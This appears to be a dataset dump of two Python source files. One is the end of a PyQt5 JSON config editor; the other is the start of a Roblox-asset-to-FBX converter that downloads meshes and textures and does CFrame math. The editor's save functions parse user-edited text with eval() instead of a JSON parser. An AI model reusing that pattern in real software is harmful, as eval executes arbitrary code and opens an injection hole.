AI_F = 
content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 3).text(0))]\n Threshold = AI_F_C['Threshold'][str(item.parent().text(0))]\n try:\n if Threshold[int(key)] is not None:\n Threshold[int(key)] = float(new)\n print('done-6')\n except:\n Threshold.append(float(new)) \n return\n except ValueError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '格式錯誤', QtWidgets.QMessageBox.Yes)\n return\n except Exception as e:\n print(e)\n QtWidgets.QMessageBox.warning(self, 'Hint', '發生錯誤', QtWidgets.QMessageBox.Yes)\n return\n QtWidgets.QMessageBox.warning(self, 'Hint', '未知key值不會被儲存', QtWidgets.QMessageBox.Yes)\n \n def DCase(self, item, key):\n try:\n \n if str(self.get_parent(item, 1).text(0)) in self.SETTINGS_KEYS:\n if int(item.text(0)) == 0:\n QtWidgets.QMessageBox.warning(self, 'Hint', '說明文字無法刪除', QtWidgets.QMessageBox.Yes)\n return\n del self.data[str(self.get_parent(item, 1).text(0))][int(item.text(0))]\n \n if str(self.get_parent(item, 1).text(0)) == 'config_set':\n try:\n if self.data['config_set'][1] is not None:\n pass\n try:\n del self.data['config_set'][int(item.text(0))]\n except Exception as e:\n print(e)\n except IndexError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '無法刪除', QtWidgets.QMessageBox.Yes)\n return\n\n #刪陣列整串\n if str(self.get_parent(item, 1).text(0)) == 'ROI':\n #ROIObj裡的ROI\n try:\n content = self.data['config_set'][int(self.get_parent(item, 6).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 4).text(0))]\n ROIObj = AI_F_C['ROIObj'][int(self.get_parent(item, 2).text(0))]\n ROI = ROIObj['ROI']\n del ROI[int(item.text(0))]\n #外面的ROI\n except:\n content = self.data['config_set'][int(self.get_parent(item, 4).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 2).text(0))]\n ROI = AI_F_C['ROI']\n del ROI[int(item.text(0))]\n return\n #刪整串\n if str(key) == 'ROI':\n #ROIObj裡的ROI\n try:\n content = self.data['config_set'][int(self.get_parent(item, 5).text(0))]['AI_features'][str(self.get_parent(item, 3).text(0))]['ROIObj'][int(self.get_parent(item, 1).text(0))]\n del content['ROI']\n #外面ROI\n except:\n content = self.data['config_set'][int(self.get_parent(item, 3).text(0))]['AI_features'][str(self.get_parent(item, 1).text(0))]\n del content['ROI']\n return\n \n if str(key) == 'switch':\n del self.data['switch']\n return\n \n if key in self.CONFIG_SET_KEYS:\n content = self.data['config_set'][int(self.get_parent(item, 1).text(0))]\n try:\n del content[str(key)]\n except Exception as e:\n print(e)\n return\n \n if key in self.AI_FEATURES_KEYS:\n content = self.data['config_set'][int(self.get_parent(item, 3).text(0))]\n AI_F = content['AI_features']\n try:\n AI_F_C = AI_F[str(item.parent().text(0))]\n del AI_F_C[str(key)]\n print('done-2')\n except Exception as e:\n print(e)\n return\n\n if key in self.ROIOBJ_KEYS:\n content = self.data['config_set'][int(self.get_parent(item, 5).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 3).text(0))]\n ROIObj = AI_F_C['ROIObj'][int(item.parent().text(0))]\n try:\n del ROIObj[str(key)] \n except Exception as e:\n print(e)\n return\n\n if str(self.get_parent(item, 2).text(0)) == 'ROI':\n #ROIObj裡的ROI\n try:\n content = self.data['config_set'][int(self.get_parent(item, 7).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 5).text(0))]\n ROIObj = AI_F_C['ROIObj'][int(self.get_parent(item, 3).text(0))]\n ROI = ROIObj['ROI'][int(item.parent().text(0))]\n ROI.remove(float(item.text(1)))\n \n #外面的ROI\n 
except ValueError:\n try:\n content = self.data['config_set'][int(self.get_parent(item, 5).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 3).text(0))]\n ROI = AI_F_C['ROI'][int(item.parent().text(0))]\n ROI.remove(float(item.text(1))) \n except:\n pass\n return\n \n if str(self.get_parent(item, 2).text(0)) == 'Threshold':\n content = self.data['config_set'][int(self.get_parent(item, 5).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 3).text(0))]\n Threshold = AI_F_C['Threshold'][str(item.parent().text(0))]\n try:\n if Threshold[1] is not None:\n pass\n try:\n Threshold.remove(float(item.text(1)))\n except:\n pass\n except:\n QtWidgets.QMessageBox.warning(self, 'Hint', '無法刪除', QtWidgets.QMessageBox.Yes)\n return\n\n #刪掉整組config_set\n if str(item.parent().text(0)) == 'config_set':\n content = self.data[str(item.parent().text(0))]\n try:\n del content[int(key)]\n except:\n del content[str(key)]\n return\n except Exception as e:\n print(e)\n QtWidgets.QMessageBox.warning(self, 'Hint', '發生錯誤', QtWidgets.QMessageBox.Yes)\n # QtWidgets.QMessageBox.warning(self, 'Hint', 'Unknow key will not be saved.', QtWidgets.QMessageBox.Yes)\n\n def get_parent(self, item, times):\n parent = item.parent()\n for i in range(times-1):\n parent = parent.parent()\n return parent\n\n def restart(self):\n QtCore.QCoreApplication.quit()\n status = QtCore.QProcess.startDetached(sys.executable, sys.argv)\n\n def Save_textEdit(self):\n \n filename = self.filenames\n update = self.textEdit.toPlainText()\n \n try:\n data = eval(update)\n \n data_for_write = json.dumps(data, indent=5, ensure_ascii=False)\n \n with open(filename[0], 'w', encoding='utf-8') as f:\n f.write(data_for_write)\n f.close()\n QtWidgets.QMessageBox.information(self, 'Hint', '存檔完成', QtWidgets.QMessageBox.Yes)\n except IndexError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '請先另存新檔', QtWidgets.QMessageBox.Yes)\n except json.decoder.JSONDecodeError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '非正確的Json格式', QtWidgets.QMessageBox.Yes)\n except Exception as e:\n print(e)\n QtWidgets.QMessageBox.warning(self, 'Hint', '發生錯誤', QtWidgets.QMessageBox.Yes)\n self.Reload()\n\n def Save_as(self):\n try:\n text = self.textEdit.toPlainText()\n data = eval(text)\n data_for_write = json.dumps(data, indent=5, ensure_ascii=False)\n name = QtWidgets.QFileDialog.getSaveFileName(self, 'Save File')\n filename = str(name[0])\n file = open(filename, 'w', encoding='utf-8')\n file.write(data_for_write)\n file.close()\n QtWidgets.QMessageBox.information(self, 'Hint', '存檔完成', QtWidgets.QMessageBox.Yes)\n self.tree_widget.clear()\n with open(filename, 'r', encoding='utf-8') as f:\n self.data = json.load(f)\n data1 = json.dumps(self.data, indent=5, ensure_ascii=False)\n self.textEdit.setText(data1)\n jfile = open(filename)\n jdata = json.load(jfile, object_pairs_hook=collections.OrderedDict)\n root_item = QtWidgets.QTreeWidgetItem([\"Root\"])\n self.recurse_jdata(jdata, root_item)\n self.tree_widget.addTopLevelItem(root_item)\n self.table_gbox.setTitle(filename)\n self.tree_widget.expandAll()\n except FileNotFoundError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '請選取正確的路徑', QtWidgets.QMessageBox.Yes)\n except json.decoder.JSONDecodeError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '非正確的Json格式', QtWidgets.QMessageBox.Yes)\n except Exception as e:\n print(e)\n QtWidgets.QMessageBox.warning(self, 'Hint', '發生錯誤', QtWidgets.QMessageBox.Yes)\n\n def recurse_jdata(self, jdata, tree_widget):\n if 
isinstance(jdata, dict): #isinstance用來判斷jdata是否為dict\n for key, val in jdata.items():\n self.tree_add_row(key, val, tree_widget)\n elif isinstance(jdata, list):\n for i, val in enumerate(jdata):\n key = str(i)\n self.tree_add_row(key, val, tree_widget)\n else:\n pass\n\n def tree_add_row(self, key, val, tree_widget):\n if isinstance(val, dict) or isinstance(val, list):#如果為還能拆解的dict, list 就再送回去拆解\n row_item = QtWidgets.QTreeWidgetItem([key])\n self.recurse_jdata(val, row_item)\n else:\n row_item = QtWidgets.QTreeWidgetItem([key, str(val)])\n tree_widget.addChild(row_item)#add on tree\n\n def find_word(self):\n words = self.find_lineEdit.text()\n if not self.textEdit.find(words):\n cursor = self.textEdit.textCursor()\n cursor.setPosition(0)\n self.textEdit.setTextCursor(cursor)\n self.textEdit.find(words)\n\nclass JsonViewer(QtWidgets.QMainWindow):\n\n def __init__(self):\n super(JsonViewer, self).__init__()\n json_view = JsonView()\n self.setCentralWidget(json_view)\n self.setWindowTitle(\"Beseye Config JSON Editor\")\n self.setMinimumSize(950, 600)\n self.show()\n\nif \"__main__\" == __name__:\n qt_app = QtWidgets.QApplication(sys.argv)\n json_viewer = JsonViewer()\n sys.exit(qt_app.exec_())","repo_name":"necrotic7/Json-Editor-PyQt5","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":29518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5884822642","text":"import math\nimport io\nimport sys\nimport os\nimport signal\nimport json\nimport gzip\nimport hashlib\nimport time\nimport fbx\nimport rbmesh\nimport logger\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport email.utils as email_utils\nimport urllib.request\nimport urllib.error\n\n\ndef ensure_path_exist(file_path: str) -> str:\n dir_name = os.path.dirname(file_path)\n if not os.path.isdir(dir_name):\n os.makedirs(dir_name)\n return dir_name\n\n\ndef detect_asset_type(content: bytes) -> str:\n\n if len(content) > 8:\n data_stream = io.BytesIO(content)\n header = data_stream.read(8)\n ktx_header = b'\\xab\\x4b\\x54\\x58\\x20\\x31\\x31\\xbb'\n if header == ktx_header:\n return 'ktx'\n\n # ascii mesh\n if len(content) > 12:\n data_stream = io.BytesIO(content)\n header = data_stream.read(12)\n mesh_v1_header = b'version 1.00'\n if header == mesh_v1_header:\n return 'mesh'\n\n # ascii mesh\n if len(content) > 12:\n data_stream = io.BytesIO(content)\n header = data_stream.read(12)\n mesh_v1_header = b'version 1.01'\n if header == mesh_v1_header:\n return 'mesh'\n\n # binary mesh\n if len(content) > 12:\n data_stream = io.BytesIO(content)\n header = data_stream.read(12)\n mesh_v1_header = b'version 2.00'\n if header == mesh_v1_header:\n return 'mesh'\n\n # binary mesh with LODs\n if len(content) > 12:\n data_stream = io.BytesIO(content)\n header = data_stream.read(12)\n mesh_v1_header = b'version 3.00'\n if header == mesh_v1_header:\n return 'mesh'\n\n # binary mesh with LODs and skinning data\n if len(content) > 12:\n data_stream = io.BytesIO(content)\n header = data_stream.read(12)\n mesh_v4_header = b'version 4.00'\n if header == mesh_v4_header:\n return 'mesh'\n mesh_v41_header = b'version 4.01'\n if header == mesh_v41_header:\n return 'mesh'\n\n if len(content) > 8:\n data_stream = io.BytesIO(content)\n header = data_stream.read(8)\n png_header = b'\\x89\\x50\\x4E\\x47\\x0D\\x0A\\x1A\\x0A'\n if header == png_header:\n return 'png'\n\n if len(content) > 10:\n data_stream = io.BytesIO(content)\n header = data_stream.read(1)\n _ = 
data_stream.read(5)\n signature = data_stream.read(4)\n if header == b'\\xFF' and signature == b'\\x4A\\x46\\x49\\x46':\n return 'jpg'\n\n if len(content) > 32:\n data_stream = io.BytesIO(content)\n header = data_stream.read(3)\n if header == b'\\x44\\x44\\x53':\n return 'dds'\n return 'raw'\n\n\ndef fetch_local_asset(file_path: str):\n\n with open(file_path, 'rb') as bin_file:\n data = bin_file.read()\n bin_file.close()\n\n h256 = hashlib.sha256()\n h256.update(data)\n\n return {\"hash\": h256.hexdigest(),\n \"cdn_url\": file_path,\n \"ts\": int(0),\n \"code\": 200,\n \"fetched_bytes\": len(data),\n \"payload_bytes\": len(data),\n \"payload\": data}, None\n\n\ndef fetch_asset(url: str) -> dict or None:\n if not url:\n return None, \"Invalid URL\"\n\n if url.startswith('rbxasset://'):\n url = \"./built-in/\" + url[11:]\n return fetch_local_asset(url)\n\n asset_fetch_endpoint = 'https://assetdelivery.roblox.com/v1/asset/?id='\n if url.startswith('rbxassetid://'):\n url = asset_fetch_endpoint + url[13:]\n elif url.startswith('https://www.roblox.com/asset/?id='):\n url = asset_fetch_endpoint + url[33:]\n elif url.startswith('http://roblox.com/asset/?id='):\n url = asset_fetch_endpoint + url[28:]\n elif url.startswith('http://www.roblox.com/asset/?id='):\n url = asset_fetch_endpoint + url[32:]\n\n try:\n request = urllib.request.Request(url)\n request.add_header('Roblox-Place-Id', '0')\n request.add_header('Accept-Encoding', 'gzip')\n request.add_header('User-Agent', 'RobloxStudio/WinInet')\n\n # noinspection PyUnusedLocal\n fetched_bytes = 0\n response = urllib.request.urlopen(request)\n if response.info().get('Content-Encoding') == 'gzip':\n compressed_data = response.read()\n fetched_bytes = len(compressed_data)\n data = gzip.decompress(compressed_data)\n else:\n data = response.read()\n fetched_bytes = len(data)\n\n cdn_url = str(response.geturl())\n\n h256 = hashlib.sha256()\n h256.update(data)\n\n html_timestamp = response.info().get('Last-Modified')\n timestamp = int(time.mktime(email_utils.parsedate(html_timestamp)))\n\n return {\"hash\": h256.hexdigest(),\n \"cdn_url\": cdn_url,\n \"ts\": timestamp,\n \"code\": response.getcode(),\n \"fetched_bytes\": fetched_bytes,\n \"payload_bytes\": len(data),\n \"payload\": data}, None\n\n except urllib.error.HTTPError as ex:\n logger.warn(\"Can't fetch asset '\" + url + \"'\")\n logger.warn(\"Code: \" + str(ex.getcode()))\n logger.warn(\"Exception: '\" + str(ex) + \"'\")\n return None, str(ex)\n except ValueError as ex:\n logger.warn(\"ValueError. Can't fetch asset \" + url)\n logger.warn(\"Exception: '\" + str(ex) + \"'\")\n return None, str(ex)\n except urllib.error.URLError as ex:\n logger.warn(\"URLError. 
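\" # (added) split across an implicit string concatenation; the message continues below\n # (added note) fetch_asset returns (payload_dict, None) on success and (None, error_string) on failure, so callers can branch on the second element instead of re-raising.\n \"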
Can't fetch asset \" + url)\n logger.warn(\"Exception: '\" + str(ex) + \"'\")\n return None, str(ex)\n\n\ndef resolve_id_to_reference(object_id: int, id_to_object: dict):\n if object_id == -1:\n return None\n else:\n return id_to_object.get(object_id, None)\n\n\nclass SceneDescription:\n def __init__(self):\n self.textures_folder = \"\"\n self.attachments_layer_id = 0\n self.bones_layer_id = 0\n self.geos_layer_id = 0\n self.accs_layer_id = 0\n self.attachments_material_id = 0\n\n\nclass Connection:\n def __init__(self, is_active, part0, part1):\n self.active = is_active\n self.part0 = part0\n self.part1 = part1\n\n\nclass CFrame:\n def __init__(self):\n self.tx = 0\n self.ty = 0\n self.tz = 0\n self.r00 = 1\n self.r01 = 0\n self.r02 = 0\n self.r10 = 0\n self.r11 = 1\n self.r12 = 0\n self.r20 = 0\n self.r21 = 0\n self.r22 = 1\n\n\ndef cframe_rotation_x(rad: float) -> CFrame:\n cos = math.cos(rad)\n sin = math.sin(rad)\n res = CFrame()\n res.r11 = cos\n res.r12 = -sin\n res.r21 = sin\n res.r22 = cos\n return res\n\n\ndef cframe_translation(x: float, y: float, z: float) -> CFrame:\n res = CFrame()\n res.tx = x\n res.ty = y\n res.tz = z\n return res\n\n\ndef cframe_rotation_y(rad: float) -> CFrame:\n cos = math.cos(rad)\n sin = math.sin(rad)\n res = CFrame()\n res.r00 = cos\n res.r02 = sin\n res.r20 = -sin\n res.r22 = cos\n return res\n\n\ndef cframe_rotation_z(rad: float) -> CFrame:\n cos = math.cos(rad)\n sin = math.sin(rad)\n res = CFrame()\n res.r00 = cos\n res.r01 = -sin\n res.r10 = sin\n res.r11 = cos\n return res\n\n\ndef cframe_roblox_to_maya(cframe: CFrame) -> CFrame:\n res = CFrame()\n res.r00 = cframe.r00\n res.r01 = cframe.r01\n res.r02 = cframe.r02\n res.r10 = cframe.r10\n res.r11 = cframe.r11\n res.r12 = cframe.r12\n res.r20 = cframe.r20\n res.r21 = cframe.r21\n res.r22 = cframe.r22\n res.tx = -cframe.tx\n res.ty = cframe.ty\n res.tz = -cframe.tz\n return res\n\n\ndef cframe_inverse(cframe: CFrame) -> CFrame:\n res = CFrame()\n\n # transposition\n res.r00 = cframe.r00\n res.r01 = cframe.r10\n res.r02 = cframe.r20\n\n res.r10 = cframe.r01\n res.r11 = cframe.r11\n res.r12 = cframe.r21\n\n res.r20 = cframe.r02\n res.r21 = cframe.r12\n res.r22 = cframe.r22\n\n res.tx = -(res.r00 * cframe.tx + res.r01 * cframe.ty + res.r02 * cframe.tz)\n res.ty = -(res.r10 * cframe.tx + res.r11 * cframe.ty + res.r12 * cframe.tz)\n res.tz = -(res.r20 * cframe.tx + res.r21 * cframe.ty + res.r22 * cframe.tz)\n\n return res\n\n\ndef cframe_multiply(a: CFrame, b: CFrame) -> CFrame:\n\n # 3x3 matrix multiplication\n res = CFrame()\n res.r00 = a.r00 * b.r00 + a.r01 * b.r10 + a.r02 * b.r20\n res.r01 = a.r00 * b.r01 + a.r01 * b.r11 + a.r02 * b.r21\n res.r02 = a.r00 * b.r02 + a.r01 * b.r12 + a.r02 * b.r22\n\n res.r10 = a.r10 * b.r00 + a.r11 * b.r10 + a.r12 * b.r20\n res.r11 = a.r10 * b.r01 + a.r11 * b.r11 + a.r12 * b.r21\n res.r12 = a.r10 * b.r02 + a.r11 * b.r12 + a.r12 * b.r22\n\n res.r20 = a.r20 * b.r00 + a.r21 * b.r10 + a.r22 * b.r20\n res.r21 = a.r20 * b.r01 + a.r21 * b.r11 + a.r22 * b.r21\n res.r22 = a.r20 * b.r02 + a.r21 * b.r12 + a.r22 * b.r22\n\n res.tx = a.r00 * b.tx + a.r01 * b.ty + a.r02 * b.tz + a.tx\n res.ty = a.r10 * b.tx + a.r11 * b.ty + a.r12 * b.tz + a.ty\n res.tz = a.r20 * b.tx + a.r21 * b.ty + a.r22 * b.tz + a.tz\n\n return res\n\n\ndef cframe_transform_pos(cframe: CFrame, x: float, y: float, z: float):\n rx = cframe.r00 * x + cframe.r01 * y + cframe.r02 * z + cframe.tx\n ry = cframe.r10 * x + cframe.r11 * y + cframe.r12 * z + cframe.ty\n rz = cframe.r20 * x + cframe.r21 * y + cframe.r22 * z 
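+ cframe.tz\n # (added note) cframe_transform_pos applies rotation plus translation; cframe_transform_vec below applies rotation only, which is what direction vectors and normals need.\n rz = cframe.r20 * x + cframe.r21 * y + cframe.r22 * z 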
+ cframe.tz\n return rx, ry, rz\n\n\ndef cframe_transform_vec(cframe: CFrame, x: float, y: float, z: float):\n rx = cframe.r00 * x + cframe.r01 * y + cframe.r02 * z\n ry = cframe.r10 * x + cframe.r11 * y + cframe.r12 * z\n rz = cframe.r20 * x + cframe.r21 * y + cframe.r22 * z\n return rx, ry, rz\n\n\nclass Instance:\n def __init__(self):\n self.name = \"\"\n self.parent = None\n self.children = list()\n\n def resolve(self, id_to_object: dict):\n self.parent = resolve_id_to_reference(self.parent, id_to_object)\n return\n\n\nclass Part(Instance):\n def __init__(self):\n super().__init__()\n self.sx = 1\n self.sy = 1\n self.sz = 1\n self.cframe = CFrame()\n\n def resolve(self, id_to_object: dict):\n super().resolve(id_to_object)\n return\n\n\nclass MeshPart(Instance):\n def __init__(self):\n super().__init__()\n self.mesh_id = \"\"\n self.mesh_type = \"\"\n self.texture_id = \"\"\n self.cframe = CFrame()\n self.texture_blob = None\n self.mesh_blob = None\n self.offset_x = 0\n self.offset_y = 0\n self.offset_z = 0\n self.scale_x = 1\n self.scale_y = 1\n self.scale_z = 1\n self.size_x = 1\n self.size_y = 1\n self.size_z = 1\n\n def resolve(self, id_to_object: dict):\n super().resolve(id_to_object)\n return\n\n\nclass Model(Instance):\n def __init__(self):\n super().__init__()\n self.primary_part = None\n\n def resolve(self, id_to_object: dict):\n super().resolve(id_to_object)\n self.primary_part = resolve_id_to_reference(self.primary_part, id_to_object)\n return\n\n\nclass Bone(Instance):\n def __init__(self):\n super().__init__()\n self.cframe = CFrame()\n self.m6d = None\n self.cframe_local = None\n\n def resolve(self, id_to_object: dict):\n super().resolve(id_to_object)\n return\n\n\nclass Attachment(Instance):\n def __init__(self):\n super().__init__()\n self.cframe = CFrame()\n self.geo = None\n\n def resolve(self, id_to_object: dict):\n super().resolve(id_to_object)\n return\n\n\nclass Accessory(Instance):\n def __init__(self):\n super().__init__()\n self.attach_point = CFrame()\n\n\nclass Motor6D(Instance):\n def __init__(self):\n super().__init__()\n self.transform = CFrame()\n self.c0 = CFrame()\n self.c1 = CFrame()\n self.part0 = None\n self.part1 = None\n\n def resolve(self, id_to_object: dict):\n super().resolve(id_to_object)\n self.part0 = resolve_id_to_reference(self.part0, id_to_object)\n self.part1 = resolve_id_to_reference(self.part1, id_to_object)\n return\n\n\nclass Weld(Instance):\n def __init__(self):\n super().__init__()\n self.part0 = None\n self.part1 = None\n\n def resolve(self, id_to_object: dict):\n super().resolve(id_to_object)\n self.part0 = resolve_id_to_reference(self.part0, id_to_object)\n self.part1 = resolve_id_to_reference(self.part1, id_to_object)\n return\n\n\ndef get_cframe(json_cframe) -> CFrame:\n res = CFrame()\n res.tx = json_cframe.get('tx', 0)\n res.ty = json_cframe.get('ty', 0)\n res.tz = json_cframe.get('tz', 0)\n res.r00 = json_cframe.get('r00', 1)\n res.r01 = json_cframe.get('r01', 0)\n res.r02 = json_cframe.get('r02', 0)\n res.r10 = json_cframe.get('r10', 0)\n res.r11 = json_cframe.get('r11', 1)\n res.r12 = json_cframe.get('r12', 0)\n res.r20 = json_cframe.get('r20', 0)\n res.r21 = json_cframe.get('r21', 0)\n res.r22 = json_cframe.get('r22', 1)\n return res\n\n\ndef parse_model_desc(model_desc) -> Instance or None:\n\n objects = list()\n id_to_object = dict()\n\n # 1st pass - parse desc and instantiate objects\n for key, dm_object in model_desc.items():\n obj = None\n obj_class = dm_object.get('Class', None)\n assert obj_class is not None\n if 
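obj_class is None:\n continue # (added) unreachable after the assert above; anchors the note below\n # (added note) pass 1 instantiates a typed wrapper per DataModel entry; unknown class names abort via logger.fatal in the else arm.\n if 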
obj_class == \"Model\":\n obj = Model()\n obj.primary_part = dm_object.get('PrimaryPart', -1)\n elif obj_class == \"Part\":\n obj = Part()\n obj.cframe = get_cframe(dm_object.get('CFrame', CFrame()))\n obj.sx = dm_object.get('SizeX', 1)\n obj.sy = dm_object.get('SizeY', 1)\n obj.sz = dm_object.get('SizeZ', 1)\n elif obj_class == \"MeshPart\":\n obj = MeshPart()\n obj.mesh_id = dm_object.get('MeshId', '')\n obj.texture_id = dm_object.get('TextureId', '')\n obj.mesh_type = dm_object.get('MeshType', 'Unsupported')\n obj.cframe = get_cframe(dm_object.get('CFrame', CFrame()))\n\n obj.offset_x = dm_object.get('OffsetX', 1)\n obj.offset_y = dm_object.get('OffsetY', 1)\n obj.offset_z = dm_object.get('OffsetZ', 1)\n\n obj.scale_x = dm_object.get('ScaleX', 1)\n obj.scale_y = dm_object.get('ScaleY', 1)\n obj.scale_z = dm_object.get('ScaleZ', 1)\n\n obj.size_x = dm_object.get('SizeX', 1)\n obj.size_y = dm_object.get('SizeY', 1)\n obj.size_z = dm_object.get('SizeZ', 1)\n elif obj_class == \"Bone\":\n obj = Bone()\n obj.cframe = get_cframe(dm_object.get('CFrame', CFrame()))\n elif obj_class == \"Attachment\":\n obj = Attachment()\n obj.cframe = get_cframe(dm_object.get('CFrame', CFrame()))\n elif obj_class == \"WeldConstraint\":\n obj = Weld()\n obj.part0 = dm_object.get('Part0', -1)\n obj.part1 = dm_object.get('Part1', -1)\n elif obj_class == \"Motor6D\":\n obj = Motor6D()\n obj.part0 = dm_object.get('Part0', -1)\n obj.part1 = dm_object.get('Part1', -1)\n obj.c0 = get_cframe(dm_object.get('C0', CFrame()))\n obj.c1 = get_cframe(dm_object.get('C1', CFrame()))\n obj.transform = get_cframe(dm_object.get('Transform', CFrame()))\n elif obj_class == \"Accessory\":\n obj = Accessory()\n obj.attach_point = get_cframe(dm_object.get('AttachPoint', CFrame()))\n else:\n logger.fatal(\"Unknown object type: \" + str(obj_class))\n\n assert obj is not None\n\n obj.name = dm_object.get('Name', None)\n obj.parent = dm_object.get('Parent', None)\n\n assert obj.name is not None\n assert obj.parent is not None\n\n id_to_object[key] = obj\n objects.append(obj)\n\n # 2nd pass - resolve numeric IDs to real references (and build hierarchy)\n root = None\n for obj in objects:\n obj.resolve(id_to_object)\n if obj.parent is None:\n # multi-root objects not supported\n assert root is None\n root = obj\n else:\n obj.parent.children.append(obj)\n\n # 3rd pass - fetch actual data from CDN\n data_cache = dict()\n for obj in objects:\n if isinstance(obj, MeshPart):\n obj.mesh_blob = data_cache.get(obj.mesh_id, None)\n if obj.mesh_blob is None:\n logger.message(\"Fetch mesh: \" + obj.mesh_id)\n obj.mesh_blob, err = fetch_asset(obj.mesh_id)\n data_cache[obj.mesh_id] = obj.mesh_blob\n else:\n logger.message(\" Cached mesh: \" + obj.mesh_id)\n\n obj.texture_blob = data_cache.get(obj.texture_id, None)\n if obj.texture_blob is None:\n logger.message(\" Fetch texture: \" + obj.texture_id)\n obj.texture_blob, err = fetch_asset(obj.texture_id)\n data_cache[obj.texture_id] = obj.texture_blob\n else:\n logger.message(\" Cached texture: \" + obj.texture_id)\n\n return root\n\n\ndef is_close(x, y, r_tol=1.e-5, a_tol=1.e-8):\n return abs(x-y) <= a_tol + r_tol * abs(y)\n\n\ndef get_bone_name_from_m6d(node: Motor6D):\n return node.part1.name\n\n\ndef get_fbx_transform(cframe: CFrame) -> fbx.FbxTransform:\n xform = fbx.FbxTransform()\n xform.px = cframe.tx\n xform.py = cframe.ty\n xform.pz = cframe.tz\n\n # Computing Euler angles from a rotation matrix\n # https://www.gregslabaugh.net/publications/euler.pdf\n # R = Rz(phi) * Ry(theta) * Rx(psi)\n phi = 
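0.0\n # (added note) the r20 = +/-1 branches handle gimbal lock: theta is +/-90 degrees, phi is pinned to 0 and psi absorbs the remaining rotation (see the cited Slabaugh paper).\n phi = 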
0.0\n if is_close(cframe.r20, -1.0):\n theta = math.pi / 2.0\n psi = math.atan2(cframe.r01, cframe.r02)\n elif is_close(cframe.r20, 1.0):\n theta = -math.pi / 2.0\n psi = math.atan2(-cframe.r01, -cframe.r02)\n else:\n theta = -math.asin(cframe.r20)\n cos_theta = math.cos(theta)\n psi = math.atan2(cframe.r21 / cos_theta, cframe.r22 / cos_theta)\n phi = math.atan2(cframe.r10 / cos_theta, cframe.r00 / cos_theta)\n\n xform.rx = math.degrees(psi)\n xform.ry = math.degrees(theta)\n xform.rz = math.degrees(phi)\n\n xform.sx = 1.0\n xform.sy = 1.0\n xform.sz = 1.0\n return xform\n\n\ndef load_mesh(file_name: str) -> rbmesh.Mesh or None:\n mesh_handle = open(file_name, 'rb')\n mesh_payload = mesh_handle.read()\n mesh_handle.close()\n mesh = rbmesh.parse_mesh(mesh_payload)\n return mesh\n\n\ndef load_mesh_as_fbx_geo(file_name: str, cframe: CFrame):\n mesh = load_mesh(file_name)\n mesh_transform_vertices(mesh, cframe)\n geo = rbmesh.convert_mesh_to_fbx_geometry(mesh, 0)\n return geo\n\n\ndef get_texture_name(url: str):\n texture_name = \"url_resolve_error\"\n\n if url.startswith('rbxassetid://'):\n texture_name = url[13:]\n elif url.startswith('https://www.roblox.com/asset/?id='):\n texture_name = url[33:]\n elif url.startswith('http://www.roblox.com/asset/?id='):\n texture_name = url[32:]\n elif url.startswith('http://roblox.com/asset/?id='):\n texture_name = url[28:]\n\n texture_name = texture_name.replace(\" \", \"\")\n texture_name = texture_name.replace(\"/\", \"\")\n texture_name = texture_name.replace(\"\\\\\", \"\")\n texture_name = texture_name.replace(\"?\", \"\")\n texture_name = texture_name.replace(\"%\", \"\")\n texture_name = texture_name.replace(\"*\", \"\")\n texture_name = texture_name.replace(\":\", \"\")\n texture_name = texture_name.replace(\"|\", \"\")\n texture_name = texture_name.replace('\"', \"\")\n texture_name = texture_name.replace('<', \"\")\n texture_name = texture_name.replace('>', \"\")\n texture_name = texture_name.replace('.', \"\")\n texture_name = texture_name.replace('@', \"\")\n return texture_name\n\n\ndef append_to_fbx(doc, node, fbx_parent_id: int, desc: SceneDescription):\n # noinspection PyUnusedLocal\n fbx_id = 0\n if isinstance(node, MeshPart):\n logger.message(\"FBX Mesh: \" + node.name)\n logger.message(\" geo: \" + node.mesh_id)\n logger.message(\" img: \" + node.texture_id)\n\n xform = get_fbx_transform(node.cframe)\n\n mesh = None\n if node.mesh_blob is None:\n if node.mesh_type == \"Head\":\n mesh = load_mesh(\"./built-in/sm_head.mesh\")\n scale_xz = min(node.scale_x, node.scale_z)\n node.scale_x = scale_xz\n node.scale_z = scale_xz\n node.scale_x = node.scale_x / 1.25\n node.scale_y = node.scale_y / 1.25\n node.scale_z = node.scale_z / 1.25\n elif node.mesh_type == \"Sphere\":\n mesh = load_mesh(\"./built-in/sm_sphere.mesh\")\n node.scale_x = node.scale_x / 1.45\n node.scale_y = node.scale_y / 1.45\n node.scale_z = node.scale_z / 1.45\n else:\n mesh_payload = node.mesh_blob[\"payload\"]\n mesh = rbmesh.parse_mesh(mesh_payload)\n\n if mesh is None:\n fbx_id = doc.create_locator(node.name, xform, fbx_parent_id)\n else:\n mat_id, mat_name = doc.create_material(node.name + \"Mat\", fbx.FbxColor4(1, 1, 1, 1))\n\n texture_file_name = \"empty.png\"\n if node.texture_blob is not None:\n texture_payload = node.texture_blob[\"payload\"]\n\n texture_hash = hashlib.sha256(texture_payload).hexdigest()\n\n texture_ext = detect_asset_type(texture_payload)\n # texture_name = get_texture_name(node.texture_id)\n texture_name = str(texture_hash)\n texture_file_name = 
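'' # (added) placeholder; the real name is assigned on the reopened line below\n # (added note) textures are written under their sha256 content hash, so parts that share a texture produce one file; the commented-out get_texture_name path used the sanitized asset id instead.\n texture_file_name = 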
